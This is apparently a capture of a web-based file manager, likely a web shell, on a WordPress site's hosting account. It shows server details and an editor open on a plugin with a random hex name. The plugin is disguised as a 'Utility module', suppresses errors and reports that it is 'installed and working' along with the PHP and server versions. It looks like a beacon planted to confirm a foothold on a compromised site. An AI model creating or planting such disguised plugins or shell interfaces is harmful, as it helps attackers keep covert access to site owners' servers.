Dashboard
PHP:
8.4.20
OS:
Linux
User:
sinnett_country
/
/
home
/
sinnett_country
/
sinnetttrailerrentals.com
/
wp-content
/
plugins
/
a943bffd
📤 Upload
📝 New File
📁 New Folder
Close
Editing: a943bffd.php
<?php /* Plugin Name: a943bffd Version: 1.0 Description: Utility module */ error_reporting(0); header('Content-Type: application/json'); echo json_encode([ 'ok' => true, 'status' => 'active', 'msg' => 'Plugin installed and working', 'php' => PHP_VERSION, 'server' => $_SERVER['SERVER_SOFTWARE'] ?? 'unknown', 'time' => date('Y-m-d H:i:s'), ]);
Save
Cancel